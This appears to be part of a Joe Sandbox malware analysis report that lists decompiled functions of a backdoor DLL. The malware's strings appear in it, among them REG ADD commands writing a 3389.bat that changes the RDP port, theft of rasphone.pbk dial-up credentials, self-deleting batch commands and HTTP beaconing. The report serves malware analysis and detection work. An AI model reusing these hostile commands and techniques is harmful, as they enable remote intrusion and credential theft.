                                • OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 10010F51
                                • LockServiceDatabase.ADVAPI32(00000000), ref: 10010F5E
                                • ChangeServiceConfigA.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10010F7B
                                • UnlockServiceDatabase.ADVAPI32(00000000), ref: 10010F82
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 10010F89
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 10010F90
                                • Sleep.KERNEL32(000001F4), ref: 10010F9B
                                Strings
                                • SYSTEM\CurrentControlSet\Services\, xrefs: 10010D70
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$Open$Manager$CloseDatabaseHandle$Lock$ControlDeleteSleep$ChangeConfigQueryStartStatusUnlock
                                • String ID: SYSTEM\CurrentControlSet\Services\
                                • API String ID: 1632965242-3886778518
                                • Opcode ID: 415cbfae56c863db6d808fe5706d43c21076e051c094c4dc012044e5d47c7044
                                • Instruction ID: 7f1d72a6b6236b21d302d541352c045c2c8a2f4db1f642aaa59284ae598933f1
                                • Opcode Fuzzy Hash: 415cbfae56c863db6d808fe5706d43c21076e051c094c4dc012044e5d47c7044
                                • Instruction Fuzzy Hash: F3712F31744365AFF731CB644C8AFBE76A5EB44B51F100228FA59AB2D0DFF08C858A60
                                Function 100074B0 Relevance: 49.2, APIs: 21, Strings: 7, Instructions: 223stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000105), ref: 100074C9
                                • strchr.MSVCRT ref: 100074DE
                                • lstrcpy.KERNEL32(00000001), ref: 100074E9
                                • lstrcat.KERNEL32(?,?), ref: 10007501
                                • lstrcat.KERNEL32(?,\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk), ref: 10007510
                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 10007520
                                • wsprintfA.USER32 ref: 10007540
                                • GetVersionExA.KERNEL32 ref: 1000756C
                                • ??2@YAPAXI@Z.MSVCRT(00001000), ref: 10007592
                                • GetPrivateProfileSectionNamesA.KERNEL32(00000000,00001000,?), ref: 100075C8
                                • GetPrivateProfileStringA.KERNEL32(00000000,DialParamsUID,00000000,?,00000100,?), ref: 10007645
                                • lstrcmp.KERNEL32(?,00000000), ref: 1000766A
                                • lstrcpy.KERNEL32(?,00000200), ref: 100076A5
                                • lstrcpy.KERNEL32(?,00000100), ref: 100076BA
                                • GetPrivateProfileStringA.KERNEL32(00000000,PhoneNumber,00000000,?,00000100,?), ref: 100076EE
                                • GetPrivateProfileStringA.KERNEL32(00000000,Device,00000000,?,00000100,?), ref: 10007706
                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,?,?,00000000,?,?), ref: 10007755
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 1000775B
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 10007761
                                • lstrlen.KERNEL32(00000000,?,00000000,?,?), ref: 1000776A
                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000779D
                                  • Part of subcall function 100073D0: wsprintfA.USER32 ref: 1000743C
                                  • Part of subcall function 100073D0: LsaFreeMemory.ADVAPI32(?), ref: 1000746A
                                  • Part of subcall function 100073D0: LsaFreeMemory.ADVAPI32(?), ref: 10007494
                                Strings
                                • Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 1000752D
                                • Device, xrefs: 10007700
                                • %s\%s, xrefs: 1000753A
                                • \Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 1000750A
                                • PhoneNumber, xrefs: 100076E8
                                • Documents and Settings\, xrefs: 100074CF
                                • DialParamsUID, xrefs: 1000763F
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??3@PrivateProfile$Stringlstrcpy$FreeMemorylstrcatwsprintf$??2@DirectoryFolderNamesPathSectionSpecialVersionWindowslstrcmplstrlenstrchr
                                • String ID: %s\%s$Device$DialParamsUID$Documents and Settings\$Microsoft\Network\Connections\pbk\rasphone.pbk$PhoneNumber$\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
                                • API String ID: 4167786638-3033193607
                                • Opcode ID: 9523fa19fb7e428b8343631ba9dac47c68eb2c2225a73468dc24c4b5fb51928c
                                • Instruction ID: f0af7ff8ab0846974cf933d747a26daa36609d74f32ab5fd33a69faa2bd6b488
                                • Opcode Fuzzy Hash: 9523fa19fb7e428b8343631ba9dac47c68eb2c2225a73468dc24c4b5fb51928c
                                • Instruction Fuzzy Hash: 4E8180B1504385AFE724CF14CC84FABB3E9FBC4740F004A1DF68A97251DB79A9458B66
                                Function 10012150 Relevance: 42.3, APIs: 19, Strings: 5, Instructions: 339stringregistrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • LocalAlloc.KERNEL32 ref: 100121A0
                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,00000040), ref: 100121D0
                                • RegEnumKeyExA.ADVAPI32(00000040,00000000,?,?,00000000,00000000,00000000,00000000), ref: 100121F6
                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 10012320
                                • RegQueryValueExA.ADVAPI32(?,DisplayName,00000000,00000007,00000007,?), ref: 1001234F
                                • RegQueryValueExA.ADVAPI32(?,UninstallString,00000000,00000007,?,00000001), ref: 1001236F
                                • strstr.MSVCRT ref: 100123F4
                                • strstr.MSVCRT ref: 1001240B
                                • lstrlen.KERNEL32(?), ref: 10012420
                                • lstrlen.KERNEL32(?), ref: 10012429
                                • LocalSize.KERNEL32(00000000), ref: 10012437
                                • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 10012445
                                • lstrlen.KERNEL32(?), ref: 10012456
                                • lstrlen.KERNEL32(?), ref: 10012474
                                • lstrlen.KERNEL32(?), ref: 10012486
                                • lstrlen.KERNEL32(?), ref: 100124AF
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 1001251F
                                • RegCloseKey.ADVAPI32(00000040), ref: 10012536
                                • LocalReAlloc.KERNEL32(00000000,00010000,00000042), ref: 10012544
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Local$Alloc$EnumOpenQueryValuestrstr$CloseSize
                                • String ID: DisplayName$Microsoft$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString$Windows
                                • API String ID: 2254360075-2665300987
                                • Opcode ID: 5921ea012968ccbaa212433031b476476b24bbda40d625663b2bfe521a7a65ef
                                • Instruction ID: 0094e60b34b218b2d156cdba79d742c6c5f7379f88ed07e575cc6fad288f1158
                                • Opcode Fuzzy Hash: 5921ea012968ccbaa212433031b476476b24bbda40d625663b2bfe521a7a65ef
                                • Instruction Fuzzy Hash: B2B1D6B16043855BD715CF24CC90BABB7DAEFC8310F444A1DFA9997280EAB4EE49C751
                                Function 1000CC70 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 141stringfileprocessCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1000CD25
                                • lstrcpy.KERNEL32(00000000,@echo off), ref: 1000CD38
                                • lstrcat.KERNEL32(00000000,@del 3596799a1543bc9f.aqq), ref: 1000CD56
                                • lstrcat.KERNEL32(00000000,@del "), ref: 1000CD68
                                • lstrcat.KERNEL32(00000000,00000000), ref: 1000CD77
                                • lstrcat.KERNEL32(00000000,"), ref: 1000CD86
                                • lstrcat.KERNEL32(00000000,@del ), ref: 1000CD95
                                • lstrcat.KERNEL32(00000000,?), ref: 1000CDA4
                                • lstrcat.KERNEL32(00000000,@exit), ref: 1000CDB3
                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 1000CDC9
                                • WriteFile.KERNEL32(00000000,?,00000800,?,00000000), ref: 1000CDE6
                                • CloseHandle.KERNEL32(00000000), ref: 1000CDED
                                • WinExec.KERNEL32(?,00000000), ref: 1000CDFA
                                • ExitProcess.KERNEL32 ref: 1000CE02
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$CloseCreateExecExitHandleModuleNameProcessWritelstrcpy
                                • String ID: @exit$"$@del $@del "$@del 3596799a1543bc9f.aqq$@echo off$afc9fe2f418b00a0.bat
                                • API String ID: 433470039-873414491
                                • Opcode ID: 4d7fb6a1bfc2b650f2c5ea7031f5b9c7acfa89c5468e2b03b9c1a4a40a83eb2a
                                • Instruction ID: 0a7f92bd5935df41e05b6577e6ab9151d6494e46dd2793a7553bbccc7f6feb7a
                                • Opcode Fuzzy Hash: 4d7fb6a1bfc2b650f2c5ea7031f5b9c7acfa89c5468e2b03b9c1a4a40a83eb2a
                                • Instruction Fuzzy Hash: 15419072519790ABEB11CB60CCC5FD67BA9EF8A310F044D98E6845F044DB74B628CB93
                                Function 10004940 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 186stringsleepthreadCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: strcspn$strstr$strncpy$ExitSleepThreadUseratoi
                                • String ID: Cache-Control: no-cacheReferer: www.qq.com$GET$^*%%RFTGYHJIRTG*(&^%DFG.asp$http://
                                • API String ID: 3047203434-1551478559
                                • Opcode ID: e412d0c515886a73b93e1546e4aa2403f2198e990efffa37e164aea4bc5c3113
                                • Instruction ID: 1c951fb19393ce52af4e69efaf2d32add5348a8144f4b5db51f252c0556f43f7
                                • Opcode Fuzzy Hash: e412d0c515886a73b93e1546e4aa2403f2198e990efffa37e164aea4bc5c3113
                                • Instruction Fuzzy Hash: 715127325102601BD704DAB48C409DF7B9AEFC6250F02461DFA9697190DE68EA4987EA
                                Function 1000FB90 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 211COMMON
                                Download Yara Rule
                                APIs
                                • LoadCursorA.USER32(00000000,00000000), ref: 1000FC53
                                  • Part of subcall function 10010520: ReleaseDC.USER32(?,?), ref: 1001053A
                                  • Part of subcall function 10010520: GetDesktopWindow.USER32 ref: 10010540
                                  • Part of subcall function 10010520: GetDC.USER32(00000000), ref: 1001054D
                                • GetDesktopWindow.USER32 ref: 1000FCA2
                                • GetDC.USER32(00000000), ref: 1000FCAF
                                • GetTickCount.KERNEL32 ref: 1000FCC3
                                • GetSystemMetrics.USER32(00000000), ref: 1000FCED
                                • GetSystemMetrics.USER32(00000001), ref: 1000FCF4
                                • CreateCompatibleDC.GDI32(?), ref: 1000FD12
                                • CreateCompatibleDC.GDI32(?), ref: 1000FD1B
                                • CreateCompatibleDC.GDI32(00000000), ref: 1000FD24
                                • CreateCompatibleDC.GDI32(00000000), ref: 1000FD2A
                                • CreateDIBSection.GDI32(?,?,00000000,0000005C,00000000,00000000), ref: 1000FD89
                                • CreateDIBSection.GDI32(?,?,00000000,00000060,00000000,00000000), ref: 1000FD9A
                                • CreateDIBSection.GDI32(?,?,00000000,00000078,00000000,00000000), ref: 1000FDAE
                                • SelectObject.GDI32(?,?), ref: 1000FDC4
                                • SelectObject.GDI32(?,?), ref: 1000FDCE
                                • SelectObject.GDI32(?,?), ref: 1000FDDE
                                • SetRect.USER32(00000034,00000000,00000000,?,?), ref: 1000FDEE
                                • ??2@YAPAXI@Z.MSVCRT(00000002), ref: 1000FDFD
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$Compatible$ObjectSectionSelect$DesktopMetricsSystemWindow$??2@CountCursorLoadRectReleaseTick
                                • String ID: I=u
                                • API String ID: 339399666-3032091488
                                • Opcode ID: 95fef00004b0c454b9c3dee54ddf510e5743c9dddf09359fd0f5be7a5ad76e64
                                • Instruction ID: 3f0a5bb4dce6945fbb730085926d6daddf735a738384ac0d5d646b014a7e3649
                                • Opcode Fuzzy Hash: 95fef00004b0c454b9c3dee54ddf510e5743c9dddf09359fd0f5be7a5ad76e64
                                • Instruction Fuzzy Hash: 6681E3B0504B459FE320CF69C884A27FBE9FB88704F004A1DE59A87B50DBB9F8458F91
                                Function 10009130 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 120stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 1000D900: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,00000001), ref: 100091B1
                                • lstrcat.KERNEL32(?,rar.exe), ref: 100091ED
                                • PathIsDirectoryA.SHLWAPI(?), ref: 100091F0
                                • lstrcpy.KERNEL32(?,?), ref: 10009209
                                • lstrcat.KERNEL32(?,.rar), ref: 10009218
                                • lstrcpy.KERNEL32(?,?), ref: 10009220
                                • lstrcat.KERNEL32(?,1007A0CC), ref: 1000922C
                                • wsprintfA.USER32 ref: 10009248
                                • lstrcpy.KERNEL32(?,?), ref: 1000926C
                                • PathRemoveExtensionA.SHLWAPI(?,?,?,?,?,?,?,00000001), ref: 10009277
                                • lstrcat.KERNEL32(?,.rar), ref: 10009287
                                • wsprintfA.USER32 ref: 1000929C
                                • ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000), ref: 100092C0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$Pathwsprintf$DirectoryExecuteExtensionOpenRemoveShelllstrlen
                                • String ID: .rar$WinRAR\shell\open\command$a %s %s$a -r %s %s$open$rar.exe
                                • API String ID: 1594156495-1032977547
                                • Opcode ID: b9f267640147a2f838cf6fb1a9db996f7ba10a8c87d01a4d513f73deca81dfce
                                • Instruction ID: afa0eefc70f7be5220eaeba01fbc78bff8034a503fb8c3defdcf7e753fe2bb58
                                • Opcode Fuzzy Hash: b9f267640147a2f838cf6fb1a9db996f7ba10a8c87d01a4d513f73deca81dfce
                                • Instruction Fuzzy Hash: A64162B2104399AEE724DBA0CC84FEB77ADEBD4704F008D1CF785A7140DA74A609CB66
                                Function 1000B420 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 212fileCOMMON
                                Download Yara Rule
                                APIs
                                • malloc.MSVCRT ref: 1000B44D
                                • atoi.MSVCRT(?), ref: 1000B46C
                                • CreateFileA.KERNEL32(c:\3389.bat,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 1000B4A0
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000B530
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000B54C
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 1000B570
                                Strings
                                • REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d , xrefs: 1000B4AB
                                • REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d , xrefs: 1000B577
                                • /f , xrefs: 1000B4D3, 1000B5AA
                                • c:\3389.bat, xrefs: 1000B49B
                                • C:\3389.bat, xrefs: 1000B68A
                                • del %0, xrefs: 1000B630
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Write$Createatoimalloc
                                • String ID: /f $C:\3389.bat$REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d $REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d $c:\3389.bat$del %0
                                • API String ID: 664794413-4273509073
                                • Opcode ID: 4a27424fdb0e6fed942fe30b310200175d70302a2057ec4e7743d62d519ea0e6
                                • Instruction ID: fb98ae05d316c3fd0aebd7eca0209f5c260241d4b25d467fdc2f7558c52bb64f
                                • Opcode Fuzzy Hash: 4a27424fdb0e6fed942fe30b310200175d70302a2057ec4e7743d62d519ea0e6
                                • Instruction Fuzzy Hash: B961B2721147846AE324CB74CC45BFB77E9EBC8310F104E2DF796932D1DAB9AA088B55
                                Function 1000D640 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 202libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D68F
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 1000D6A3
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 1000D6AF
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 1000D6BB
                                • GetProcAddress.KERNEL32(00000000,getsockname), ref: 1000D6C7
                                • GetProcAddress.KERNEL32(00000000,select), ref: 1000D6D3
                                • GetLastError.KERNEL32(00000000), ref: 1000D6F0
                                • GetLastError.KERNEL32(00000000), ref: 1000D740
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$ErrorLast$LibraryLoad
                                • String ID: connect$getsockname$recv$select$socket$ws2_32.dll
                                • API String ID: 1969025732-1466708075
                                • Opcode ID: 4869f2540624f0de57036062d3a6f7b94b0a05a06f79d3c308fa5c7f5636398a
                                • Instruction ID: 9eea021e2679a54889db195b2b8dea17cea3e2387c884d07e69dbabe29e95218
                                • Opcode Fuzzy Hash: 4869f2540624f0de57036062d3a6f7b94b0a05a06f79d3c308fa5c7f5636398a
                                • Instruction Fuzzy Hash: EB716E716083419BE310DF64C884A5FBBE5FFC8354F108A2EF58987290E775D845CB66
                                Function 10004790 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 148libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(wininet.dll), ref: 100047A3
                                • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 100047C1
                                • GetProcAddress.KERNEL32(00000000,InternetConnectA), ref: 100047CB
                                • GetProcAddress.KERNEL32(00000000,HttpOpenRequestA), ref: 100047D7
                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 100047E3
                                • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 100047EF
                                • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 100047FB
                                • printf.MSVCRT ref: 100048EB
                                • FreeLibrary.KERNEL32(00000000), ref: 1000491A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Library$FreeLoadprintf
                                • String ID: HTTP/1.1$Hackeroo$HttpOpenRequestA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetOpenA$InternetReadFile$wininet.dll
                                • API String ID: 2425834421-3882969375
                                • Opcode ID: ab2da8832e121b78344de6fdb46b171ab1ca8c0203973e7725e5a9d28d361bfa
                                • Instruction ID: 681ed2cf8dfbe48c2289dcdc3772bf4013358cff2fe0b36028245d622f2c89cd
                                • Opcode Fuzzy Hash: ab2da8832e121b78344de6fdb46b171ab1ca8c0203973e7725e5a9d28d361bfa
                                • Instruction Fuzzy Hash: 1E41D271504344ABE220DF658C44FAFBBE8EBC5B50F40491DF68567180DBB8E9048B9A
                                Function 10011260 Relevance: 30.1, APIs: 20, Instructions: 85pipesleepthreadCOMMON
                                Download Yara Rule
                                APIs
                                • TerminateThread.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 10011277
                                • Sleep.KERNEL32(00000001,?,?,?,10009D95,?), ref: 10011281
                                • TerminateProcess.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 10011289
                                • TerminateThread.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 10011295
                                • Sleep.KERNEL32(00000001,?,?,?,10009D95,?), ref: 10011299
                                • WaitForSingleObject.KERNEL32(?,000007D0,?,?,?,10009D95,?), ref: 100112A4
                                • TerminateThread.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 100112B0
                                • Sleep.KERNEL32(00000001,?,?,?,10009D95,?), ref: 100112B4
                                • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112C4
                                • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112CE
                                • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112D8
                                • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112E2
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 100112EE
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 100112F4
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 100112FA
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011300
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011306
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 1001130C
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011312
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011318
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
